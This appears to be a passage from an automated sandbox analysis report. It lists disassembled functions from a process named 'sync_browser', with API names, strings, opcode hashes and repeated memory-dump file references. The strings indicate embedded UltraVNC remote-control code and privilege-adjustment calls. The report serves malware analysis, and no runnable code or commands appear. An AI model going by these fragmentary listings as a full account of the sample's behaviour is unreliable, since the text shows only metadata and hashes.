                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
                                                                    • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                    • API String ID: 3702840025-1174184736
                                                                    • Opcode ID: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                    • Instruction ID: a6efb747a58668b16c4571b0aab58d86c930fe8b5dba2d005715ba5777e502b5
                                                                    • Opcode Fuzzy Hash: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                    • Instruction Fuzzy Hash: FB318025B09A9685F770CB25B854BAE62A4FBC9744F840136CA9E83B88DF3CD117CB00
                                                                    Function 00007FF6DC119A40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                                    • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                                    • API String ID: 771632046-3493897170
                                                                    • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                    • Instruction ID: f2a22527fb9150b02b01a442133b2757994a2b2b73fa12358acf6f506191ae9c
                                                                    • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                    • Instruction Fuzzy Hash: DD316232A1CA9AC1EA60DF50F8547AE73A4FB89754F801133E65D82694CF3DD11BCB00
                                                                    Function 00007FF6DC0D18A0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
                                                                    • String ID: SeTcbPrivilege
                                                                    • API String ID: 2450735924-1502394177
                                                                    • Opcode ID: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                    • Instruction ID: d758b5a8ecd3235fbe7b1d94b1a57962e6ab540ab09d04b770352aea9196031f
                                                                    • Opcode Fuzzy Hash: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                    • Instruction Fuzzy Hash: 83215E61B18B4A82FB50DF62F8052AE63A4FF89B54F440036EA5E86754DF7DD067CB40
                                                                    Function 00007FF6DC17DF80 Relevance: 15.3, APIs: 10, Instructions: 292timeCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                                    • String ID:
                                                                    • API String ID: 2532449802-0
                                                                    • Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                    • Instruction ID: 6c976f95c5d16b238bfce437616f5b91d6cad415e38fd9de51ea6b79f908dfc6
                                                                    • Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                    • Instruction Fuzzy Hash: EBC16F32E0C2AA89EB249F25ED5166E7699BF85740F408137DA4D93BD6DF3CE4239700
                                                                    Function 00007FF6DC18068C Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1457502553-0
                                                                    • Opcode ID: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                    • Instruction ID: d939479cd2811c37b73a3e0f95d32d0049c273185d58e5b636475945a61fbac2
                                                                    • Opcode Fuzzy Hash: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                    • Instruction Fuzzy Hash: 8591C773F0865F5BEB589F25CC51BAD2699EF54784F048036DA0DCAB89EE3CE5628700
                                                                    Function 00007FF6DC0C6060 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 354libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressInfoProcSystem$Version
                                                                    • String ID: @$GetNativeSystemInfo$GetVersionExA
                                                                    • API String ID: 4103462327-1183986914
                                                                    • Opcode ID: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                    • Instruction ID: 56927bd42ef5d2b6d719903941711e5dac03d84e21e82163b0947f311cba6ee2
                                                                    • Opcode Fuzzy Hash: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                    • Instruction Fuzzy Hash: 00F18E72A086858AE760CF71D5503BD77A0FB49B48F188036DE4D8B299DF3DE566CB20
                                                                    Function 00007FF6DC0E51B7 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopOpen$ClipboardCloseInput
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2872304593-3977938048
                                                                    • Opcode ID: 41fdc7f4038987e70fb881bd2a8b0bfd294fc6fa25dfdabd30afa84ad6723627
                                                                    • Instruction ID: f829a54f7d2a4cf0f183add5f9aaa7f1e96aba74acd2770892308d16e56e07aa
                                                                    • Opcode Fuzzy Hash: 41fdc7f4038987e70fb881bd2a8b0bfd294fc6fa25dfdabd30afa84ad6723627
                                                                    • Instruction Fuzzy Hash: BD12D132A086D985EB65DB25C8587FD27A9EB85B88F144137CA0DCBBD5CF3AD462C700
                                                                    Function 00007FF6DC1178E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                                    • String ID: UseRegistry$admin$admin_auth
                                                                    • API String ID: 3374479654-3376419731
                                                                    • Opcode ID: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                    • Instruction ID: 780a75a0d08170fbafa734007bf6153be76150310b5866576a941f0be7807892
                                                                    • Opcode Fuzzy Hash: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                    • Instruction Fuzzy Hash: 1E31723261CA5A81EB618B11EC447AEB3A8FB99794F441137EA8D83B94DF3CD516CB40
                                                                    Function 00007FF6DC0E1620 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 323COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • i, xrefs: 00007FF6DC0E1809
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6DC0E166F
                                                                    • unable to determine legacy authentication method, xrefs: 00007FF6DC0E173F
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
                                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
                                                                    • API String ID: 2847437661-1576074771
                                                                    • Opcode ID: 4c04c3d75062cb184de61391ac266afc18fbb013ad7d6cff4a4c70e5b1d16c34
                                                                    • Instruction ID: a8dc64112fb05c52f9f47caa13e83a834e1747888010fff0c49d3c01e7a03dc1
                                                                    • Opcode Fuzzy Hash: 4c04c3d75062cb184de61391ac266afc18fbb013ad7d6cff4a4c70e5b1d16c34
                                                                    • Instruction Fuzzy Hash: B9D1AD32B4865685FB14CB65D8443BC27AAEB84764F184236DA6ED7AD6CF39E853C300
                                                                    Function 00007FF6DC117650 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 47registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$FileModuleNamePrivateProfile
                                                                    • String ID: Software\UltraVNC$UseRegistry$admin$mslogon
                                                                    • API String ID: 27673491-2056936749
                                                                    • Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                    • Instruction ID: ccb2c7b962ee55afe94dae962d88dd163076bdd615e3e6d2491e95e9211d7a0d
                                                                    • Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                    • Instruction Fuzzy Hash: 7121443291CB5A92E7608F10F8917AEB368FB98354F801136E69D83B54DF7DD12ACB40
                                                                    Function 00007FF6DC0D3550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 337752880-3733053543
                                                                    • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                    • Instruction ID: ce09386953cde39f3e8e9e00fcfdb3e6df69c6fa1454c733777afc1720a70001
                                                                    • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                    • Instruction Fuzzy Hash: 77116371A1874685E750DB20F8597AEB3A4FF84744F804036E59E86A54DF7DD16BCB00
                                                                    Function 00007FF6DC0F1660 Relevance: 12.3, APIs: 8, Instructions: 292windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$RectVisible$Foreground
                                                                    • String ID:
                                                                    • API String ID: 2499709836-0
                                                                    • Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                    • Instruction ID: cac2d5df6b2154522390b5cf568a5dd405bfe7ed54cbbcc9ae6d55d548a44e17
                                                                    • Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                    • Instruction Fuzzy Hash: 11D16F32B186958EEB14CFB9D4406EC37B6F788B48B10513ADE0DA7B88DF3594A6C744
                                                                    Function 00007FF6DC0D3D50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
